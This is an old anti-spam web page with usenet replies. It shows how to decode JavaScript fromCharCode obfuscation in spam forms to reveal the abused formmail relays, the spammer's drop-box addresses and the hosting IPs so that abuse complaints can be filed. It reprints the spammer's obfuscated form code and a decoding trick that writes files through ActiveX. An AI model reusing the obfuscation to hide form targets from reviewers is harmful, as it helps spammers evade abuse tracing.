How to trace E-mail form spams

• A form with JavaScript content that accesses other sites
• Some pointers from news.admin.net-abuse.email participants
• A site that accesses another site: How to eliminate "Eliminate Your Debt Today at .30-.50 Cents on The Dollar.."

The following is the form on the spammer's Web page. It includes JavaScript.

[irrelevent stuff deleted]
 

<SCRIPT language=JavaScript>
document.write(String.fromCharCode(60,105,110,112,117,116,32,116,121,112,101,61,34,104,105,100,100,101,110,34,32,110,97,109,101,61,34,115,117,98,106,101,99,116,34,32,118,97,108,117,101,61,34,68,101,98,116,76,101,97,100,49,34,62,13,10));
document.write(String.fromCharCode(60,105,110,112,117,116,32,116,121,112,101,61,34,104,105,100,100,101,110,34,32,110,97,109,101,61,34,114,101,102,101,114,114,101,114,34,32,118,97,108,117,101,61,34,49,48,53,34,62));
</SCRIPT>
  <p align="center"><input type="submit" value="Submit" name="B1"><input type="reset" value="Reset" name="B2"></p>
</form>
<div align="center"><br><p><font size="-1">Please be patient for form to submit...</font></p></div>
 <!-- Opt-Out starts here-->

 <br><br><br><br><br><hr><br><br><br><br><br>
 <div align="center">
 <b><font face="Verdana" size="2"><font color="#FF0000">Permanently
Remove</font><font color="#000000"> yourself from future mailings below:

<SCRIPT language=JavaScript>
document.write(String.fromCharCode(60,102,111,114,109,32,109,101,116,104,111,100,61,34,112,111,115,116,34,32,97,99,116,105,111,110,61,34,104,116,116,112,58,47,47,119,119,119,46,97,113,117,105,110,97,115,46,99,111,109,47,99,103,105,45,98,105,110,47,102,111,114,109,109,97,105,108,46,112,108,34,62,13,10));
document.write(String.fromCharCode(60,105,110,112,117,116,32,116,121,112,101,61,34,104,105,100,100,101,110,34,32,110,97,109,101,61,34,114,101,100,105,114,101,99,116,34,32,118,97,108,117,101,61,34,104,116,116,112,58,47,47,51,53,49,49,57,57,49,55,55,52,47,112,112,99,51,47,116,104,97,110,107,121,111,117,46,104,116,109,108,34,62,13,10));
document.write(String.fromCharCode(60,105,110,112,117,116,32,116,121,112,101,61,34,104,105,100,100,101,110,34,32,110,97,109,101,61,34,114,101,99,105,112,105,101,110,116,34,32,118,97,108,117,101,61,34,70,97,117,115,116,105,110,111,80,85,49,48,64,99,97,110,97,100,97,46,99,111,109,34,62,13,10));
document.write(String.fromCharCode(60,105,110,112,117,116,32,116,121,112,101,61,34,104,105,100,100,101,110,34,32,110,97,109,101,61,34,115,117,98,106,101,99,116,34,32,118,97,108,117,101,61,34,82,101,109,111,118,97,108,50,34,62));
</SCRIPT>
 

[more irrelevent material deleted]

</body>

</html>

The first block of String.fromCharCode doesn't reveal anything interesting. But here's what to do with the rest. Copy the string of numbers with commas between them and copy them into Microsoft Excel.

Use DATA/TEXT-TO-COLUMNS to put one number into each column, using the comma as the field delimiter.

60 102 111 114 109 32 109 101 116 104 111 100 61 34 112 111 115 116 34 32 97 99 116 105 111 110 61 34 104 116 116 112 58 47 47 119 119 119 46 97 113 117 105 110 97 115 46 99 111 109 47 99 103 105 45 98 105 110 47 102 111 114 109 109 97 105 108 46 112 108 34 62

Next, put =CHAR() under each number. If 60 is in A1, put =CHAR(A1) into cell B1. Copy across the board. Bingo.

< f o r m   m e t h o d = " p o s t "   a c t i o n = " h t t p : / / w w w . a q u i n a s . c o m / c g i - b i n / f o r m m a i l . p l " >

Continuing,

60 105 110 112 117 116 32 116 121 112 101 61 34 104 105 100 100 101 110 34 32 110 97 109 101 61 34 114 101 100 105 114 101 99 116 34 32 118 97 108 117 101 61 34 104 116 116 112 58 47 47 51 53 49 49 57 57 49 55 55 52 47 112 112 99 51 47 116 104 97 110 107 121 111 117 46 104 116 109 108 34 62
< i n p u t   t y p e = " h i d d e n "   n a m e = " r e d i r e c t "   v a l u e = " h t t p : / / 3 5 1 1 9 9 1 7 7 4 / p p c 3 / t h a n k y o u . h t m l " >
(This is just Vortexwebzone.com, as you can find by pasting it into your browser.)

60 105 110 112 117 116 32 116 121 112 101 61 34 104 105 100 100 101 110 34 32 110 97 109 101 61 34 114 101 99 105 112 105 101 110 116 34 32 118 97 108 117 101 61 34 70 97 117 115 116 105 110 111 80 85 49 48 64 99 97 110 97 100 97 46 99 111 109 34 62
< i n p u t   t y p e = " h i d d e n "   n a m e = " r e c i p i e n t "   v a l u e = " F a u s t i n o P U 1 0 @ c a n a d a . c o m " >
Send a complaint to canada.com

60 105 110 112 117 116 32 116 121 112 101 61 34 104 105 100 100 101 110 34 32 110 97 109 101 61 34 115 117 98 106 101 99 116 34 32 118 97 108 117 101 61 34 82 101 109 111 118 97 108 50 34 62
< i n p u t   t y p e = " h i d d e n "   n a m e = " s u b j e c t "   v a l u e = " R e m o v a l 2 " >

Some pointers from news.admin.net-abuse.email

By the way, if you just want to download a page, say
"http://vortexwebzone.com/ppc3/dbt/O1234.JS"
create a small web page on your hard drive, say - one line:

 [a href="http://vortexwebzone.com/ppc3/dbt/O1234.JS"]get it[/a]

(change the square brackets to angle brackets - I didn't use
 angle brackets so this will not affect your mail reader if it is
 HTML aware) and load it (e.g. Netscape, FILE|OPEN_FILE).
Then *right* click on the "get it" link item and choose to save
the link to disk (or whatever your browser uses as its terminology).
That way you can download the file, even if putting the address in
the location bar does not work. You can then load it into NOTEPAD,
say, safely to examine it.

You mention that you did see that the submission form accessed
"nebula.fi" (from something that logs connections?) - that was due
to the formmail used by the submission form (hidden in the separate
JavaScript module). It could have been this or one of two other
sites with insecure formmail (emailing) scripts (the JavaScript
file that is included randomly chooses one of three insecure
mailer scripts to use).

Regards from:
[withheld upon request]

William A. Levinson <wlevinso@ix.NOSPAM4MEnetcom.com> wrote:
> http://vortexwebzone.com/ppc3/dbt/?cxo "Financial Independence Today"
> spam. (Assuming it's still up when you view it, heh heh heh. Well, the
> relevent parts are on my new antispam page.) VERY clever. It used to be
> that you could view the page's source code and complain to all the
> mailto: addresses inside. This one doesn't have any. It uses JavaScript
> to generate the mailto: contacts from ASCII code letters.

Good job in decoding the form (though there are other ways to do it ... such as a QBasic programme to convert ASCII codes to letters, or conversion
of 60,32,45,.... to &#60;&#32;&#45;... (do a global search and replace of the comma with ";&#" and then put in the &# at the front and the semi-colon at the end) and view that string in an HTML capable programme ... numerical HTML entities are coded as &#xx; where xx is the decimal ascii code for the character and can appear in HTML and browsers will handle the decoding automatically)).

There are lots of ways of converting decimal ascii values to characters. Good that you found one that you can use.

However ...

For http://vortexwebzone.com/ppc3/dbt/?cxo I get a frameset. [frameset rows="100%,*"]
(so the first frame should take up the entire page and the second is hidden)

                   [title]Bad credit?[/title]

with two frames (watch the 0 vs O and 1 vs l) O10l.html, 0lO1.html

The first frame includes:

Something you didn't mention:

 document.write(String.fromCharCode(32,60,83,67,82,73,80,84,32,83,
       82,67,61,34,79,49,50,51,52,46,74,83,34,62,60,47,83,67,82,
       73,80,84,62))

 which decodes to:
  [SCRIPT SRC="O1234.JS"][/SCRIPT]

 (which indicates there is a hidden JavaScript module in this other file)

 (in JavaScript, [script src=...][/script] will cause the referenced file   to load and run right there)

This module (O1234.JS) does a couple of things.
===============================================

First, it randomly chooses one of three formmail scripts and writes the following to the web page as it is loading (well, it writes one
of the following three - which one? It is randomly chosen).

First Choice:
[form action="http://www.saunalahti.fi/cgi-bin/FormMail"
 method="POST" name="form" onsubmit="return check();"]

Second Choice:
[form action="http://ti89-fr.virtualave.net/cgi-bin/formmail-vf.pl"
 method="POST" name="form" onsubmit="return check();"]

Third Choice:
[form action="http://www.nebula.fi/cgi-bin/formmail.cgi" method="POST"
 name="form" onsubmit="return check();"]

(even if you get one of the formmail sites to block him, two thirds of his  junk still works - and if you manage to see the part that is decoded for
 your visit, you may see only one of the form actions, not all three -  I just tried the site ... for me, it chose the nebula.fi formmail script -
 but the JavaScript code randomly choose a number and uses that to decide  which action to write to the page - I used a packet capture programme,
 TCPDUMP (Linux) to capture the output to verify that it did use one  of these scripts)

Then it writes the code:

[input type="hidden" name="redirect"
 value="_url_thankyou.html"]
{here _url_ is the current directory location - it is a JavaScript
 variable, "url," taken from the URL of the page - that way,
 the spammer can move his site to a new location and not have manually
 to change anything here - the code will automatically be using the
 url of the new location without his having to change the code on the
 page}
[input type="hidden" name="recipient" value="LanaJZS4@apexmail.com"]

(the packet capture verified that this recipient value was sent as part
 of the submission)

OK ... that is the JavaScript module ... which does the above.
(the check() function just checks that you have entered a phone number)

==============================================================

Then there is more javascript written in the page, as you discovered:

One section setting up some variables:
[input type="hidden" name="subject" value="DebtLead1"]
[input type="hidden" name="referrer" value="105"]

Then there is an ending [/form] tag (after some fields to fill in)
to end the submission form.
---------------------------

Then one DOES find the script you indicated:

But there's more ... another line ...

"Permanently Remove yourself from future mailings below:" (title)

[form method="post" action="http://www.aquinas.com/cgi-bin/formmail.pl"]
[input type="hidden" name="redirect" value="http://3511991774/ppc3/thankyou.html"]
[input type="hidden" name="recipient" value="FaustinoPU10@canada.com"]

and another line which is decoded and written:
[input type="hidden" name="subject" value="Removal2"]

This second form is the "remove your address from my spam" form.

(What about this "http://3511991774/ppc3/thankyou.html"?
 Well, vortexwebzone.com is at IP address 209.84.189.222
 which is precisely what the decimal number, 3511991774_decimal,
 is in base_256 - this is just a page to which you are redirected
 after submitting the removal form.
 You see that the submission form also redirects ... this is used
 by many scripts to redirect you to a thank_you_for_submitting
 page after you click the submit button.
 There appear to be two thank you pages:
 http://vortexwebzone.com/ppc3/dbt/thankyou.html and
 http://vortexwebzone.com/ppc3/thankyou.html
 But they both (there really are two pages! I checked them both)
 are the same:
 "Thank you for your submission."
 (well, I lied ... they are not the same ... one has a different
 background colour, apparently...))
=======================================================

You discovered the second form - the removal form.

However, the setup for the submission form is contained in

http://vortexwebzone.com/ppc3/dbt/O1234.JS
(a separate JavaScript module that you have to load and decode)

(yes ... they are becoming more and more determined that you
 NOT locate them; alert the system whose formmail they are
 abusing; etc.)

(there are two forms ... one ending with [/form] but you won't find
 any [form] section starting it unless you look in the JavaScript
 module file, the *.JS file that is loaded - it is followed by the
 removal form whose code is on the page and which you found)

So ... canada.com for the removal email address (removal form)
but LanaJZS4@apexmail.com for the spammer's drop box (where
he collects the submissions) and four folks with insecure
formmail scripts that the spammer is abusing (one for the removal
and three for the submission which the spammer appears to consider
more important).

Hi Uncle Rom,

I read your page about tracing e-mail form spams with delight, especially because your example spammer
("Bad credit, Poor credit, No CREDIT?") is an old enemy of mine.. :-))

Your Excel-method is nice. Here is how I do it:

Insert

var fso = new ActiveXObject("Scripting.FileSystemObject");
var a = fso.CreateTextFile("C:\\output.txt", true);

at the start of the script section. This will open the text-file 'output.txt'.
Then replace every 'document.write' with 'a.writeline'.
At the end you can close the file, if you want:  'a.Close()'

The example from your website would then look like this:
 

<SCRIPT language=JavaScript>

var fso = new ActiveXObject("Scripting.FileSystemObject");
var a = fso.CreateTextFile("C:\\output.txt", true);

a.writeline(String.fromCharCode(60,105,110,112,117,116,32,116,121,112,101,61,34,104,105,100,100,101,110,34,32,110,97,109,101,61,34,115,117,98,106,101,99,116,34,32,118,97,108,117,101,61,34,68,101,98,116,76,101,97,100,49,34,62,13,10));
a.writeline(String.fromCharCode(60,105,110,112,117,116,32,116,121,112,101,61,34,104,105,100,100,101,110,34,32,110,97,109,101,61,34,114,101,102,101,114,114,101,114,34,32,118,97,108,117,101,61,34,49,48,53,34,62));

a.writeline(String.fromCharCode(60,102,111,114,109,32,109,101,116,104,111,100,61,34,112,111,115,116,34,32,97,99,116,105,111,110,61,34,104,116,116,112,58,47,47,119,119,119,46,97,113,117,105,110,97,115,46,99,111,109,47,99,103,105,45,98,105,110,47,102,111,114,109,109,97,105,108,46,112,108,34,62,13,10));
a.writeline(String.fromCharCode(60,105,110,112,117,116,32,116,121,112,101,61,34,104,105,100,100,101,110,34,32,110,97,109,101,61,34,114,101,100,105,114,101,99,116,34,32,118,97,108,117,101,61,34,104,116,116,112,58,47,47,51,53,49,49,57,57,49,55,55,52,47,112,112,99,51,47,116,104,97,110,107,121,111,117,46,104,116,109,108,34,62,13,10));
a.writeline(String.fromCharCode(60,105,110,112,117,116,32,116,121,112,101,61,34,104,105,100,100,101,110,34,32,110,97,109,101,61,34,114,101,99,105,112,105,101,110,116,34,32,118,97,108,117,101,61,34,70,97,117,115,116,105,110,111,80,85,49,48,64,99,97,110,97,100,97,46,99,111,109,34,62,13,10));
a.writeline(String.fromCharCode(60,105,110,112,117,116,32,116,121,112,101,61,34,104,105,100,100,101,110,34,32,110,97,109,101,61,34,115,117,98,106,101,99,116,34,32,118,97,108,117,101,61,34,82,101,109,111,118,97,108,50,34,62));

a.Close()

</SCRIPT>
 

If you 'execute' this in your browser you will get the following 'output.txt' :

----------
<input type="hidden" name="subject" value="DebtLead1">

<input type="hidden" name="referrer" value="105">
<form method="post" action="http://www.aquinas.com/cgi-bin/formmail.pl">

<input type="hidden" name="redirect" value="http://3511991774/ppc3/thankyou.html">

<input type="hidden" name="recipient" value="FaustinoPU10@canada.com">

<input type="hidden" name="subject" value="Removal2">
----------
 

Might be a bit faster...

BTW: Here is a nice link for 'translating' IP-numbers

http://www.fichtner.net/tools/ip2dword/

Keep on the good work...

"Hans from Berlin"
 

How to eliminate "Eliminate Your Debt Today at .30-.50 Cents on The Dollar.."

Some humor first:

> Are You Suffering with Debt?

No, I'm suffering from too much UCE

>   Can't Sleep In Because of Harassing Phone Calls?

No, harassment by spammers is the problem.

> Or do you just want to reduce and pay off your all credit card bills?

I want to reduce spam.

> We can eliminate up to 60% of your debt through negotiations!

We can eliminate you... here goes.

Here are the relevent parts of his source code:

Return-Path: <steph@dedicatedisp.com>
Received: from TmpStr ([65.45.213.134]) Tracing route to 65-45-213-134.customer.algx.net [65.45.213.134]
 by motown (Earthlink/Netcom Mail Service) with SMTP id tm43cm.pa8.37tiu50
 for < >; Fri, 27 Jul 2001 17:55:50 -0700 (PDT)
Reply-To: "Steph"<steph@dedicatedisp.com>
From: "Steph"<steph@dedicatedisp.com>
To: "" < >
Organization:
X-Priority: 1
X-MSMail-Priority: High
Subject: Eliminate Your Debt Today at .30-.50 Cents on The Dollar..
Sender: "Steph"<steph@dedicatedisp.com>
Mime-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Date: Fri, 27 Jul 2001 17:51:30 -0700
Message-Id: <200107271755.tm43cm.pa8.37tiu50@motown>
X-Mozilla-Status: d001
X-Mozilla-Status2: 00000000
X-UIDL: tm43cn.pa8.37tiu50.0

[deleted]
<p align="center"><font face="Verdana" size="2">*This does not apply to home or  auto loans</font>.</p>
<p align="center"><font face="Verdana" size="2"><b>Our process is successful almost 100% of the time!</b></font> </p>
<p align="center">Want more information? -- <a href="http://1093522818"><font color="#003399">CLICK  HERE</font></a></p>
<p align="center">&nbsp;</p>
<p align="center"><a href="mailto:bluskytrader@yahoo.com"><font color="#003399">unsubscribe</font></a></p>
</body>
</html>
 

PING 1093522818 to get his IP address,  65.45.213.130
TRACEROUTE (how convenient):

Tracing route to 65-45-213-130.customer.algx.net [65.45.213.130]

so you forward his spewage to postmaster and abuse "at" algx.net. But you're not done...

Fill in his form with enough gibberish to keep his system from rejecting it for unfilled fields. Press Submit. (Repeat if necessary to get the
necessary information). Doing this accesses yet another domain, you'll see it on the lower left hand corner of Netscape Communicator.

3516097042

Ping it to get the IP address, it's Ezdebtsolutions

Tracing route to 209.147.98.18 over a maximum of 30 hops

  1   180 ms   186 ms   195 ms  srv7-5-16.nwr2.bd.ans.net [207.205.234.158]
  2   175 ms   190 ms   200 ms  gw1.nwr2.bd.ans.net [207.205.234.252]
[deleted]
 12   378 ms   339 ms   420 ms  Interwrx.t3-2-1-0.ar2.DEN2.gblx.net [64.212.41.66]
 13   259 ms   259 ms   289 ms itchy.interwrx.com [209.210.172.34]
 14   285 ms   280 ms   300 ms  209.147.98.18

Trace complete.

and it's, "Adios!"